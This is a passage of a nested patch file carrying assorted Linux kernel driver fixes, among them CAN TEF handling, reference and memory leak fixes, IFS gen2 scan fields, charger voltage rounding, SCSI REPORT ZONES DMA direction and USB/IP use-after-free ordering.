++	BUILD_BUG_ON(sizeof(tx_ring->obj_num) != sizeof(chip_tx_tail));
++	BUILD_BUG_ON(sizeof(tx_ring->obj_num) != sizeof(tail));
++	BUILD_BUG_ON(sizeof(tx_ring->obj_num) != sizeof(len));
+ 
+-	/* ... but it cannot exceed the TX head. */
+-	priv->tef->head = min(new_head, tx_ring->head);
++	len = (chip_tx_tail << shift) - (tail << shift);
++	*len_p = len >> shift;
+ 
+-	return mcp251xfd_check_tef_tail(priv);
++	return 0;
+ }
+ 
+ static inline int
+@@ -182,13 +186,12 @@ int mcp251xfd_handle_tefif(struct mcp251xfd_priv *priv)
+ 	u8 tef_tail, len, l;
+ 	int err, i;
+ 
+-	err = mcp251xfd_tef_ring_update(priv);
++	err = mcp251xfd_get_tef_len(priv, &len);
+ 	if (err)
+ 		return err;
+ 
+ 	tef_tail = mcp251xfd_get_tef_tail(priv);
+-	len = mcp251xfd_get_tef_len(priv);
+-	l = mcp251xfd_get_tef_linear_len(priv);
++	l = mcp251xfd_get_tef_linear_len(priv, len);
+ 	err = mcp251xfd_tef_obj_read(priv, hw_tef_obj, tef_tail, l);
+ 	if (err)
+ 		return err;
+@@ -203,12 +206,12 @@ int mcp251xfd_handle_tefif(struct mcp251xfd_priv *priv)
+ 		unsigned int frame_len = 0;
+ 
+ 		err = mcp251xfd_handle_tefif_one(priv, &hw_tef_obj[i], &frame_len);
+-		/* -EAGAIN means the Sequence Number in the TEF
+-		 * doesn't match our tef_tail. This can happen if we
+-		 * read the TEF objects too early. Leave loop let the
+-		 * interrupt handler call us again.
++		/* -EBADMSG means we're affected by mcp2518fd erratum
++		 * DS80000789E 6., i.e. the Sequence Number in the TEF
++		 * doesn't match our tef_tail. Don't process any
++		 * further and mark processed frames as good.
+ 		 */
+-		if (err == -EAGAIN)
++		if (err == -EBADMSG)
+ 			goto out_netif_wake_queue;
+ 		if (err)
+ 			return err;
+@@ -223,6 +226,8 @@ int mcp251xfd_handle_tefif(struct mcp251xfd_priv *priv)
+ 		struct mcp251xfd_tx_ring *tx_ring = priv->tx;
+ 		int offset;
+ 
++		ring->head += len;
++
+ 		/* Increment the TEF FIFO tail pointer 'len' times in
+ 		 * a single SPI message.
+ 		 *
+diff --git a/drivers/net/can/spi/mcp251xfd/mcp251xfd.h b/drivers/net/can/spi/mcp251xfd/mcp251xfd.h
+index b98ded7098a5a..78d12dda08a05 100644
+--- a/drivers/net/can/spi/mcp251xfd/mcp251xfd.h
++++ b/drivers/net/can/spi/mcp251xfd/mcp251xfd.h
+@@ -519,6 +519,7 @@ struct mcp251xfd_tef_ring {
+ 
+ 	/* u8 obj_num equals tx_ring->obj_num */
+ 	/* u8 obj_size equals sizeof(struct mcp251xfd_hw_tef_obj) */
++	/* u8 obj_num_shift_to_u8 equals tx_ring->obj_num_shift_to_u8 */
+ 
+ 	union mcp251xfd_write_reg_buf irq_enable_buf;
+ 	struct spi_transfer irq_enable_xfer;
+@@ -537,6 +538,7 @@ struct mcp251xfd_tx_ring {
+ 	u8 nr;
+ 	u8 fifo_nr;
+ 	u8 obj_num;
++	u8 obj_num_shift_to_u8;
+ 	u8 obj_size;
+ 
+ 	struct mcp251xfd_tx_obj obj[MCP251XFD_TX_OBJ_NUM_MAX];
+@@ -843,17 +845,8 @@ static inline u8 mcp251xfd_get_tef_tail(const struct mcp251xfd_priv *priv)
+ 	return priv->tef->tail & (priv->tx->obj_num - 1);
+ }
+ 
+-static inline u8 mcp251xfd_get_tef_len(const struct mcp251xfd_priv *priv)
++static inline u8 mcp251xfd_get_tef_linear_len(const struct mcp251xfd_priv *priv, u8 len)
+ {
+-	return priv->tef->head - priv->tef->tail;
+-}
+-
+-static inline u8 mcp251xfd_get_tef_linear_len(const struct mcp251xfd_priv *priv)
+-{
+-	u8 len;
+-
+-	len = mcp251xfd_get_tef_len(priv);
+-
+ 	return min_t(u8, len, priv->tx->obj_num - mcp251xfd_get_tef_tail(priv));
+ }
+ 
+diff --git a/drivers/net/dsa/bcm_sf2.c b/drivers/net/dsa/bcm_sf2.c
+index cd1f240c90f39..257df16768750 100644
+--- a/drivers/net/dsa/bcm_sf2.c
++++ b/drivers/net/dsa/bcm_sf2.c
+@@ -678,8 +678,10 @@ static int bcm_sf2_mdio_register(struct dsa_switch *ds)
+ 			of_remove_property(child, prop);
+ 
+ 		phydev = of_phy_find_device(child);
+-		if (phydev)
++		if (phydev) {
+ 			phy_device_remove(phydev);
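++			/* of_phy_find_device() took a reference; drop it too. */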
++			phy_device_free(phydev);
++		}
+ 	}
+ 
+ 	err = mdiobus_register(priv->slave_mii_bus);
+diff --git a/drivers/net/ethernet/freescale/fec_ptp.c b/drivers/net/ethernet/freescale/fec_ptp.c
+index e0393dc159fc7..37d83ff5b30be 100644
+--- a/drivers/net/ethernet/freescale/fec_ptp.c
++++ b/drivers/net/ethernet/freescale/fec_ptp.c
+@@ -635,6 +635,9 @@ void fec_ptp_stop(struct platform_device *pdev)
+ 	struct net_device *ndev = platform_get_drvdata(pdev);
+ 	struct fec_enet_private *fep = netdev_priv(ndev);
+ 
++	if (fep->pps_enable)
++		fec_ptp_enable_pps(fep, 0);
++
+ 	cancel_delayed_work_sync(&fep->time_keep);
+ 	if (fep->ptp_clock)
+ 		ptp_clock_unregister(fep->ptp_clock);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_rx.c b/drivers/net/ethernet/mellanox/mlx5/core/en_rx.c
+index 56d1bd22c7c66..97d1cfec4ec03 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_rx.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_rx.c
+@@ -2146,6 +2146,9 @@ static void mlx5e_handle_rx_cqe_mpwrq_shampo(struct mlx5e_rq *rq, struct mlx5_cq
+ 	if (likely(wi->consumed_strides < rq->mpwqe.num_strides))
+ 		return;
+ 
++	if (unlikely(!cstrides))
++		return;
++
+ 	wq  = &rq->mpwqe.wq;
+ 	wqe = mlx5_wq_ll_get_wqe(wq, wqe_id);
+ 	mlx5e_free_rx_mpwqe(rq, wi, true);
+diff --git a/drivers/net/usb/qmi_wwan.c b/drivers/net/usb/qmi_wwan.c
+index 46e0e1f1c20e0..ee0ea3d0f50ee 100644
+--- a/drivers/net/usb/qmi_wwan.c
++++ b/drivers/net/usb/qmi_wwan.c
+@@ -200,6 +200,7 @@ static int qmimux_rx_fixup(struct usbnet *dev, struct sk_buff *skb)
+ 			break;
+ 		default:
+ 			/* not ip - do not know what to do */
++			kfree_skb(skbn);
+ 			goto skip;
+ 		}
+ 
+diff --git a/drivers/nvme/host/pci.c b/drivers/nvme/host/pci.c
+index 27446fa847526..6f648b58cbd4d 100644
+--- a/drivers/nvme/host/pci.c
++++ b/drivers/nvme/host/pci.c
+@@ -873,9 +873,9 @@ static blk_status_t nvme_map_metadata(struct nvme_dev *dev, struct request *req,
+ 		struct nvme_command *cmnd)
+ {
+ 	struct nvme_iod *iod = blk_mq_rq_to_pdu(req);
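++	/* rq_integrity_vec() returns the bvec by value; dma_map_bvec()
++	 * wants a pointer, hence the local copy.
++	 */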
++	struct bio_vec bv = rq_integrity_vec(req);
+ 
+-	iod->meta_dma = dma_map_bvec(dev->dev, rq_integrity_vec(req),
+-			rq_dma_dir(req), 0);
++	iod->meta_dma = dma_map_bvec(dev->dev, &bv, rq_dma_dir(req), 0);
+ 	if (dma_mapping_error(dev->dev, iod->meta_dma))
+ 		return BLK_STS_IOERR;
+ 	cmnd->rw.metadata = cpu_to_le64(iod->meta_dma);
+@@ -1016,7 +1016,7 @@ static __always_inline void nvme_pci_unmap_rq(struct request *req)
+ 	        struct nvme_iod *iod = blk_mq_rq_to_pdu(req);
+ 
+ 		dma_unmap_page(dev->dev, iod->meta_dma,
+-			       rq_integrity_vec(req)->bv_len, rq_dma_dir(req));
++			       rq_integrity_vec(req).bv_len, rq_dma_dir(req));
+ 	}
+ 
+ 	if (blk_rq_nr_phys_segments(req))
+diff --git a/drivers/platform/x86/intel/ifs/ifs.h b/drivers/platform/x86/intel/ifs/ifs.h
+index 73c8e91cf144d..1902a1722df1e 100644
+--- a/drivers/platform/x86/intel/ifs/ifs.h
++++ b/drivers/platform/x86/intel/ifs/ifs.h
+@@ -157,9 +157,17 @@ union ifs_chunks_auth_status {
+ union ifs_scan {
+ 	u64	data;
+ 	struct {
+-		u32	start	:8;
+-		u32	stop	:8;
+-		u32	rsvd	:16;
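++		/* Gen0 hardware exposes 8-bit start/stop chunk indices;
++		 * gen2 widens them to 16 bits.
++		 */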
++		union {
++			struct {
++				u8	start;
++				u8	stop;
++				u16	rsvd;
++			} gen0;
++			struct {
++				u16	start;
++				u16	stop;
++			} gen2;
++		};
+ 		u32	delay	:31;
+ 		u32	sigmce	:1;
+ 	};
+@@ -169,9 +177,17 @@ union ifs_scan {
+ union ifs_status {
+ 	u64	data;
+ 	struct {
+-		u32	chunk_num		:8;
+-		u32	chunk_stop_index	:8;
+-		u32	rsvd1			:16;
++		union {
++			struct {
++				u8	chunk_num;
++				u8	chunk_stop_index;
++				u16	rsvd1;
++			} gen0;
++			struct {
++				u16	chunk_num;
++				u16	chunk_stop_index;
++			} gen2;
++		};
+ 		u32	error_code		:8;
+ 		u32	rsvd2			:22;
+ 		u32	control_error		:1;
+diff --git a/drivers/platform/x86/intel/ifs/runtest.c b/drivers/platform/x86/intel/ifs/runtest.c
+index b2ca2bb4501f6..aeb6a3b7a8fd9 100644
+--- a/drivers/platform/x86/intel/ifs/runtest.c
++++ b/drivers/platform/x86/intel/ifs/runtest.c
+@@ -165,25 +165,35 @@ static int doscan(void *data)
+  */
+ static void ifs_test_core(int cpu, struct device *dev)
+ {
++	union ifs_status status = {};
+ 	union ifs_scan activate;
+-	union ifs_status status;
+ 	unsigned long timeout;
+ 	struct ifs_data *ifsd;
++	int to_start, to_stop;
++	int status_chunk;
+ 	u64 msrvals[2];
+ 	int retries;
+ 
+ 	ifsd = ifs_get_data(dev);
+ 
+-	activate.rsvd = 0;
++	activate.gen0.rsvd = 0;
+ 	activate.delay = IFS_THREAD_WAIT;
+ 	activate.sigmce = 0;
+-	activate.start = 0;
+-	activate.stop = ifsd->valid_chunks - 1;
++	to_start = 0;
++	to_stop = ifsd->valid_chunks - 1;
++
++	if (ifsd->generation) {
++		activate.gen2.start = to_start;
++		activate.gen2.stop = to_stop;
++	} else {
++		activate.gen0.start = to_start;
++		activate.gen0.stop = to_stop;
++	}
+ 
+ 	timeout = jiffies + HZ / 2;
+ 	retries = MAX_IFS_RETRIES;
+ 
+-	while (activate.start <= activate.stop) {
++	while (to_start <= to_stop) {
+ 		if (time_after(jiffies, timeout)) {
+ 			status.error_code = IFS_SW_TIMEOUT;
+ 			break;
+@@ -194,13 +204,14 @@ static void ifs_test_core(int cpu, struct device *dev)
+ 
+ 		status.data = msrvals[1];
+ 
+-		trace_ifs_status(cpu, activate, status);
++		trace_ifs_status(cpu, to_start, to_stop, status.data);
+ 
+ 		/* Some cases can be retried, give up for others */
+ 		if (!can_restart(status))
+ 			break;
+ 
+-		if (status.chunk_num == activate.start) {
++		status_chunk = ifsd->generation ? status.gen2.chunk_num : status.gen0.chunk_num;
++		if (status_chunk == to_start) {
+ 			/* Check for forward progress */
+ 			if (--retries == 0) {
+ 				if (status.error_code == IFS_NO_ERROR)
+@@ -209,7 +220,11 @@ static void ifs_test_core(int cpu, struct device *dev)
+ 			}
+ 		} else {
+ 			retries = MAX_IFS_RETRIES;
+-			activate.start = status.chunk_num;
++			if (ifsd->generation)
++				activate.gen2.start = status_chunk;
++			else
++				activate.gen0.start = status_chunk;
++			to_start = status_chunk;
+ 		}
+ 	}
+ 
+diff --git a/drivers/power/supply/axp288_charger.c b/drivers/power/supply/axp288_charger.c
+index 15219ed43ce95..d3a93f1afef82 100644
+--- a/drivers/power/supply/axp288_charger.c
++++ b/drivers/power/supply/axp288_charger.c
+@@ -178,18 +178,18 @@ static inline int axp288_charger_set_cv(struct axp288_chrg_info *info, int cv)
+ 	u8 reg_val;
+ 	int ret;
+ 
+-	if (cv <= CV_4100MV) {
+-		reg_val = CHRG_CCCV_CV_4100MV;
+-		cv = CV_4100MV;
+-	} else if (cv <= CV_4150MV) {
+-		reg_val = CHRG_CCCV_CV_4150MV;
+-		cv = CV_4150MV;
+-	} else if (cv <= CV_4200MV) {
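++	/* Round the requested voltage down to the nearest supported
++	 * setting, bottoming out at CV_4100MV.
++	 */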
++	if (cv >= CV_4350MV) {
++		reg_val = CHRG_CCCV_CV_4350MV;
++		cv = CV_4350MV;
++	} else if (cv >= CV_4200MV) {
+ 		reg_val = CHRG_CCCV_CV_4200MV;
+ 		cv = CV_4200MV;
++	} else if (cv >= CV_4150MV) {
++		reg_val = CHRG_CCCV_CV_4150MV;
++		cv = CV_4150MV;
+ 	} else {
+-		reg_val = CHRG_CCCV_CV_4350MV;
+-		cv = CV_4350MV;
++		reg_val = CHRG_CCCV_CV_4100MV;
++		cv = CV_4100MV;
+ 	}
+ 
+ 	reg_val = reg_val << CHRG_CCCV_CV_BIT_POS;
+@@ -337,8 +337,8 @@ static int axp288_charger_usb_set_property(struct power_supply *psy,
+ 		}
+ 		break;
+ 	case POWER_SUPPLY_PROP_CONSTANT_CHARGE_VOLTAGE:
+-		scaled_val = min(val->intval, info->max_cv);
+-		scaled_val = DIV_ROUND_CLOSEST(scaled_val, 1000);
++		scaled_val = DIV_ROUND_CLOSEST(val->intval, 1000);
++		scaled_val = min(scaled_val, info->max_cv);
+ 		ret = axp288_charger_set_cv(info, scaled_val);
+ 		if (ret < 0) {
+ 			dev_warn(&info->pdev->dev, "set charge voltage failed\n");
+diff --git a/drivers/s390/char/sclp_sd.c b/drivers/s390/char/sclp_sd.c
+index f9e164be7568f..944e75beb160c 100644
+--- a/drivers/s390/char/sclp_sd.c
++++ b/drivers/s390/char/sclp_sd.c
+@@ -320,8 +320,14 @@ static int sclp_sd_store_data(struct sclp_sd_data *result, u8 di)
+ 			  &esize);
+ 	if (rc) {
+ 		/* Cancel running request if interrupted */
+-		if (rc == -ERESTARTSYS)
+-			sclp_sd_sync(page, SD_EQ_HALT, di, 0, 0, NULL, NULL);
++		if (rc == -ERESTARTSYS) {
++			if (sclp_sd_sync(page, SD_EQ_HALT, di, 0, 0, NULL, NULL)) {
++				pr_warn("Could not stop Store Data request - leaking at least %zu bytes\n",
++					(size_t)dsize * PAGE_SIZE);
++				data = NULL;
++				asce = 0;
++			}
++		}
+ 		vfree(data);
+ 		goto out;
+ 	}
+diff --git a/drivers/scsi/mpi3mr/mpi3mr_os.c b/drivers/scsi/mpi3mr/mpi3mr_os.c
+index 7a6b006e70c88..7bd24f71cc385 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr_os.c
++++ b/drivers/scsi/mpi3mr/mpi3mr_os.c
+@@ -3389,6 +3389,17 @@ static int mpi3mr_prepare_sg_scmd(struct mpi3mr_ioc *mrioc,
+ 		    scmd->sc_data_direction);
+ 		priv->meta_sg_valid = 1; /* To unmap meta sg DMA */
+ 	} else {
++		/*
++		 * Some firmware versions byte-swap the REPORT ZONES command
++		 * reply from ATA-ZAC devices by accessing it directly in the
++		 * host buffer. This does not respect the default command DMA
++		 * direction and causes IOMMU page faults on some architectures
++		 * with an IOMMU enforcing write mappings (e.g. AMD hosts).
++		 * Avoid such an issue by making the REPORT ZONES buffer
++		 * mapping bi-directional.
++		 */
++		if (scmd->cmnd[0] == ZBC_IN && scmd->cmnd[1] == ZI_REPORT_ZONES)
++			scmd->sc_data_direction = DMA_BIDIRECTIONAL;
+ 		sg_scmd = scsi_sglist(scmd);
+ 		sges_left = scsi_dma_map(scmd);
+ 	}
+diff --git a/drivers/scsi/mpt3sas/mpt3sas_base.c b/drivers/scsi/mpt3sas/mpt3sas_base.c
+index 421a03dbbeb73..03fcaf7359391 100644
+--- a/drivers/scsi/mpt3sas/mpt3sas_base.c
++++ b/drivers/scsi/mpt3sas/mpt3sas_base.c
+@@ -2672,6 +2672,22 @@ _base_build_zero_len_sge_ieee(struct MPT3SAS_ADAPTER *ioc, void *paddr)
+ 	_base_add_sg_single_ieee(paddr, sgl_flags, 0, 0, -1);
+ }
+ 
++static inline int _base_scsi_dma_map(struct scsi_cmnd *cmd)
++{
++	/*
++	 * Some firmware versions byte-swap the REPORT ZONES command reply from
++	 * ATA-ZAC devices by accessing it directly in the host buffer. This
++	 * does not respect the default command DMA direction and causes IOMMU
++	 * page faults on some architectures with an IOMMU enforcing write
++	 * mappings (e.g. AMD hosts). Avoid such an issue by making the report
++	 * zones buffer mapping bi-directional.
++	 */
++	if (cmd->cmnd[0] == ZBC_IN && cmd->cmnd[1] == ZI_REPORT_ZONES)
++		cmd->sc_data_direction = DMA_BIDIRECTIONAL;
++
++	return scsi_dma_map(cmd);
++}
++
+ /**
+  * _base_build_sg_scmd - main sg creation routine
+  *		pcie_device is unused here!
+@@ -2718,7 +2734,7 @@ _base_build_sg_scmd(struct MPT3SAS_ADAPTER *ioc,
+ 	sgl_flags = sgl_flags << MPI2_SGE_FLAGS_SHIFT;
+ 
+ 	sg_scmd = scsi_sglist(scmd);
+-	sges_left = scsi_dma_map(scmd);
++	sges_left = _base_scsi_dma_map(scmd);
+ 	if (sges_left < 0)
+ 		return -ENOMEM;
+ 
+@@ -2862,7 +2878,7 @@ _base_build_sg_scmd_ieee(struct MPT3SAS_ADAPTER *ioc,
+ 	}
+ 
+ 	sg_scmd = scsi_sglist(scmd);
+-	sges_left = scsi_dma_map(scmd);
++	sges_left = _base_scsi_dma_map(scmd);
+ 	if (sges_left < 0)
+ 		return -ENOMEM;
+ 
+diff --git a/drivers/spi/spi-fsl-lpspi.c b/drivers/spi/spi-fsl-lpspi.c
+index 9e324d72596af..dd2381ac27f67 100644
+--- a/drivers/spi/spi-fsl-lpspi.c
++++ b/drivers/spi/spi-fsl-lpspi.c
+@@ -297,7 +297,7 @@ static void fsl_lpspi_set_watermark(struct fsl_lpspi_data *fsl_lpspi)
+ static int fsl_lpspi_set_bitrate(struct fsl_lpspi_data *fsl_lpspi)
+ {
+ 	struct lpspi_config config = fsl_lpspi->config;
+-	unsigned int perclk_rate, scldiv;
++	unsigned int perclk_rate, scldiv, div;
+ 	u8 prescale;
+ 
+ 	perclk_rate = clk_get_rate(fsl_lpspi->clk_per);
+@@ -308,8 +308,10 @@ static int fsl_lpspi_set_bitrate(struct fsl_lpspi_data *fsl_lpspi)
+ 		return -EINVAL;
+ 	}
+ 
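++	/* Round the divider up so that perclk_rate / div does not exceed
++	 * speed_hz.
++	 */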
++	div = DIV_ROUND_UP(perclk_rate, config.speed_hz);
++
+ 	for (prescale = 0; prescale < 8; prescale++) {
+-		scldiv = perclk_rate / config.speed_hz / (1 << prescale) - 2;
++		scldiv = div / (1 << prescale) - 2;
+ 		if (scldiv < 256) {
+ 			fsl_lpspi->config.prescale = prescale;
+ 			break;
+diff --git a/drivers/spi/spidev.c b/drivers/spi/spidev.c
+index 00612efc2277f..477c3578e7d9e 100644
+--- a/drivers/spi/spidev.c
++++ b/drivers/spi/spidev.c
+@@ -692,6 +692,7 @@ static const struct file_operations spidev_fops = {
+ static struct class *spidev_class;
+ 
+ static const struct spi_device_id spidev_spi_ids[] = {
++	{ .name = "bh2228fv" },
+ 	{ .name = "dh2228fv" },
+ 	{ .name = "ltc2488" },
+ 	{ .name = "sx1301" },
+diff --git a/drivers/tty/serial/serial_core.c b/drivers/tty/serial/serial_core.c
+index fe3f1d655dfe2..58e857fb8deeb 100644
+--- a/drivers/tty/serial/serial_core.c
++++ b/drivers/tty/serial/serial_core.c
+@@ -846,6 +846,14 @@ static int uart_set_info(struct tty_struct *tty, struct tty_port *port,
+ 	new_flags = (__force upf_t)new_info->flags;
+ 	old_custom_divisor = uport->custom_divisor;
+ 
++	if (!(uport->flags & UPF_FIXED_PORT)) {
++		unsigned int uartclk = new_info->baud_base * 16;
++		/* check needs to be done here before other settings made */
++		if (uartclk == 0) {
++			retval = -EINVAL;
++			goto exit;
++		}
++	}
+ 	if (!capable(CAP_SYS_ADMIN)) {
+ 		retval = -EPERM;
+ 		if (change_irq || change_port ||
+diff --git a/drivers/ufs/core/ufshcd.c b/drivers/ufs/core/ufshcd.c
+index 5922cb5a1de0d..bfed5d36fa2e5 100644
+--- a/drivers/ufs/core/ufshcd.c
++++ b/drivers/ufs/core/ufshcd.c
+@@ -3909,11 +3909,16 @@ static inline void ufshcd_add_delay_before_dme_cmd(struct ufs_hba *hba)
+ 			min_sleep_time_us =
+ 				MIN_DELAY_BEFORE_DME_CMDS_US - delta;
+ 		else
+-			return; /* no more delay required */
++			min_sleep_time_us = 0; /* no more delay required */
+ 	}
+ 
+-	/* allow sleep for extra 50us if needed */
+-	usleep_range(min_sleep_time_us, min_sleep_time_us + 50);
++	if (min_sleep_time_us > 0) {
++		/* allow sleep for extra 50us if needed */
++		usleep_range(min_sleep_time_us, min_sleep_time_us + 50);
++	}
++
++	/* Record the completion time so the next DME command is spaced correctly */
++	hba->last_dme_cmd_tstamp = ktime_get();
+ }
+ 
+ /**
+diff --git a/drivers/usb/gadget/function/u_audio.c b/drivers/usb/gadget/function/u_audio.c
+index ec1dceb087293..0be0966973c7f 100644
+--- a/drivers/usb/gadget/function/u_audio.c
++++ b/drivers/usb/gadget/function/u_audio.c
+@@ -592,16 +592,25 @@ int u_audio_start_capture(struct g_audio *audio_dev)
+ 	struct usb_ep *ep, *ep_fback;
+ 	struct uac_rtd_params *prm;
+ 	struct uac_params *params = &audio_dev->params;
+-	int req_len, i;
++	int req_len, i, ret;
+ 
+ 	prm = &uac->c_prm;
+ 	dev_dbg(dev, "start capture with rate %d\n", prm->srate);
+ 	ep = audio_dev->out_ep;
+-	config_ep_by_speed(gadget, &audio_dev->func, ep);
++	ret = config_ep_by_speed(gadget, &audio_dev->func, ep);
++	if (ret < 0) {
++		dev_err(dev, "config_ep_by_speed for out_ep failed (%d)\n", ret);
++		return ret;
++	}
++
+ 	req_len = ep->maxpacket;
+ 
+ 	prm->ep_enabled = true;
+-	usb_ep_enable(ep);
++	ret = usb_ep_enable(ep);
++	if (ret < 0) {
++		dev_err(dev, "usb_ep_enable failed for out_ep (%d)\n", ret);
++		return ret;
++	}
+ 
+ 	for (i = 0; i < params->req_number; i++) {
+ 		if (!prm->reqs[i]) {
+@@ -629,9 +638,18 @@ int u_audio_start_capture(struct g_audio *audio_dev)
+ 		return 0;
+ 
+ 	/* Setup feedback endpoint */
+-	config_ep_by_speed(gadget, &audio_dev->func, ep_fback);
++	ret = config_ep_by_speed(gadget, &audio_dev->func, ep_fback);
++	if (ret < 0) {
++		dev_err(dev, "config_ep_by_speed in_ep_fback failed (%d)\n", ret);
++		return ret; /* TODO: Clean up out_ep */
++	}
++
+ 	prm->fb_ep_enabled = true;
+-	usb_ep_enable(ep_fback);
++	ret = usb_ep_enable(ep_fback);
++	if (ret < 0) {
++		dev_err(dev, "usb_ep_enable failed for in_ep_fback (%d)\n", ret);
++		return ret; /* TODO: Clean up out_ep */
++	}
+ 	req_len = ep_fback->maxpacket;
+ 
+ 	req_fback = usb_ep_alloc_request(ep_fback, GFP_ATOMIC);
+@@ -687,13 +705,17 @@ int u_audio_start_playback(struct g_audio *audio_dev)
+ 	struct uac_params *params = &audio_dev->params;
+ 	unsigned int factor;
+ 	const struct usb_endpoint_descriptor *ep_desc;
+-	int req_len, i;
++	int req_len, i, ret;
+ 	unsigned int p_pktsize;
+ 
+ 	prm = &uac->p_prm;
+ 	dev_dbg(dev, "start playback with rate %d\n", prm->srate);
+ 	ep = audio_dev->in_ep;
+-	config_ep_by_speed(gadget, &audio_dev->func, ep);
++	ret = config_ep_by_speed(gadget, &audio_dev->func, ep);
++	if (ret < 0) {
++		dev_err(dev, "config_ep_by_speed for in_ep failed (%d)\n", ret);
++		return ret;
++	}
+ 
+ 	ep_desc = ep->desc;
+ 	/*
+@@ -720,7 +742,11 @@ int u_audio_start_playback(struct g_audio *audio_dev)
+ 	uac->p_residue_mil = 0;
+ 
+ 	prm->ep_enabled = true;
+-	usb_ep_enable(ep);
++	ret = usb_ep_enable(ep);
++	if (ret < 0) {
++		dev_err(dev, "usb_ep_enable failed for in_ep (%d)\n", ret);
++		return ret;
++	}
+ 
+ 	for (i = 0; i < params->req_number; i++) {
+ 		if (!prm->reqs[i]) {
+diff --git a/drivers/usb/gadget/function/u_serial.c b/drivers/usb/gadget/function/u_serial.c
+index 3c51355ccc94d..1f143c6ba86bd 100644
+--- a/drivers/usb/gadget/function/u_serial.c
++++ b/drivers/usb/gadget/function/u_serial.c
+@@ -1436,6 +1436,7 @@ void gserial_suspend(struct gserial *gser)
+ 	spin_lock(&port->port_lock);
+ 	spin_unlock(&serial_port_lock);
+ 	port->suspended = true;
++	port->start_delayed = true;
+ 	spin_unlock_irqrestore(&port->port_lock, flags);
+ }
+ EXPORT_SYMBOL_GPL(gserial_suspend);
+diff --git a/drivers/usb/gadget/udc/core.c b/drivers/usb/gadget/udc/core.c
+index 82a10774a7ebc..9dc31a416ec2e 100644
+--- a/drivers/usb/gadget/udc/core.c
++++ b/drivers/usb/gadget/udc/core.c
+@@ -118,12 +118,10 @@ int usb_ep_enable(struct usb_ep *ep)
+ 		goto out;
+ 
+ 	/* UDC drivers can't handle endpoints with maxpacket size 0 */
+-	if (usb_endpoint_maxp(ep->desc) == 0) {
+-		/*
+-		 * We should log an error message here, but we can't call
+-		 * dev_err() because there's no way to find the gadget
+-		 * given only ep.
+-		 */
++	if (!ep->desc || usb_endpoint_maxp(ep->desc) == 0) {
++		WARN_ONCE(1, "%s: ep%d (%s) has %s\n", __func__, ep->address, ep->name,
++			  (!ep->desc) ? "NULL descriptor" : "maxpacket 0");
++
+ 		ret = -EINVAL;
+ 		goto out;
+ 	}
+diff --git a/drivers/usb/serial/usb_debug.c b/drivers/usb/serial/usb_debug.c
+index aaf4813e4971e..406cb326e8124 100644
+--- a/drivers/usb/serial/usb_debug.c
++++ b/drivers/usb/serial/usb_debug.c
+@@ -69,6 +69,11 @@ static void usb_debug_process_read_urb(struct urb *urb)
+ 	usb_serial_generic_process_read_urb(urb);
+ }
+ 
++static void usb_debug_init_termios(struct tty_struct *tty)
++{
++	tty->termios.c_lflag &= ~(ECHO | ECHONL);
++}
++
+ static struct usb_serial_driver debug_device = {
+ 	.driver = {
+ 		.owner =	THIS_MODULE,
+@@ -78,6 +83,7 @@ static struct usb_serial_driver debug_device = {
+ 	.num_ports =		1,
+ 	.bulk_out_size =	USB_DEBUG_MAX_PACKET_SIZE,
+ 	.break_ctl =		usb_debug_break_ctl,
++	.init_termios =		usb_debug_init_termios,
+ 	.process_read_urb =	usb_debug_process_read_urb,
+ };
+ 
+@@ -89,6 +95,7 @@ static struct usb_serial_driver dbc_device = {
+ 	.id_table =		dbc_id_table,
+ 	.num_ports =		1,
+ 	.break_ctl =		usb_debug_break_ctl,
++	.init_termios =		usb_debug_init_termios,
+ 	.process_read_urb =	usb_debug_process_read_urb,
+ };
+ 
+diff --git a/drivers/usb/usbip/vhci_hcd.c b/drivers/usb/usbip/vhci_hcd.c
+index 233265550fc63..6b98f5ab6dfed 100644
+--- a/drivers/usb/usbip/vhci_hcd.c
++++ b/drivers/usb/usbip/vhci_hcd.c
+@@ -745,6 +745,7 @@ static int vhci_urb_enqueue(struct usb_hcd *hcd, struct urb *urb, gfp_t mem_flag
+ 	 *
+ 	 */
+ 	if (usb_pipedevice(urb->pipe) == 0) {
++		struct usb_device *old;
+ 		__u8 type = usb_pipetype(urb->pipe);
+ 		struct usb_ctrlrequest *ctrlreq =
+ 			(struct usb_ctrlrequest *) urb->setup_packet;
+@@ -755,14 +756,15 @@ static int vhci_urb_enqueue(struct usb_hcd *hcd, struct urb *urb, gfp_t mem_flag
+ 			goto no_need_xmit;
+ 		}
+ 
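++		/* Keep a reference to the old udev until the new one is
++		 * installed, so concurrent users never see a freed pointer.
++		 */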
++		old = vdev->udev;
+ 		switch (ctrlreq->bRequest) {
+ 		case USB_REQ_SET_ADDRESS:
+ 			/* set_address may come when a device is reset */
+ 			dev_info(dev, "SetAddress Request (%d) to port %d\n",
+ 				 ctrlreq->wValue, vdev->rhport);
+ 
+-			usb_put_dev(vdev->udev);
+ 			vdev->udev = usb_get_dev(urb->dev);
++			usb_put_dev(old);
+ 
+ 			spin_lock(&vdev->ud.lock);
+ 			vdev->ud.status = VDEV_ST_USED;
+@@ -781,8 +783,8 @@ static int vhci_urb_enqueue(struct usb_hcd *hcd, struct urb *urb, gfp_t mem_flag
+ 				usbip_dbg_vhci_hc(
+ 					"Not yet?:Get_Descriptor to device 0 (get max pipe size)\n");
+ 
+-			usb_put_dev(vdev->udev);
+ 			vdev->udev = usb_get_dev(urb->dev);
++			usb_put_dev(old);
+ 			goto out;
+ 
+ 		default:
+@@ -1067,6 +1069,7 @@ static void vhci_shutdown_connection(struct usbip_device *ud)
+ static void vhci_device_reset(struct usbip_device *ud)
+ {
+ 	struct vhci_device *vdev = container_of(ud, struct vhci_device, ud);
++	struct usb_device *old = vdev->udev;
+ 	unsigned long flags;
+ 
+ 	spin_lock_irqsave(&ud->lock, flags);
+@@ -1074,8 +1077,8 @@ static void vhci_device_reset(struct usbip_device *ud)
+ 	vdev->speed  = 0;
+ 	vdev->devid  = 0;
+ 
+-	usb_put_dev(vdev->udev);
+ 	vdev->udev = NULL;
++	usb_put_dev(old);
+ 
+ 	if (ud->tcp_socket) {
+ 		sockfd_put(ud->tcp_socket);
+diff --git a/drivers/vhost/vdpa.c b/drivers/vhost/vdpa.c
+index c8374527a27d9..55f88eeb78a72 100644
+--- a/drivers/vhost/vdpa.c
++++ b/drivers/vhost/vdpa.c
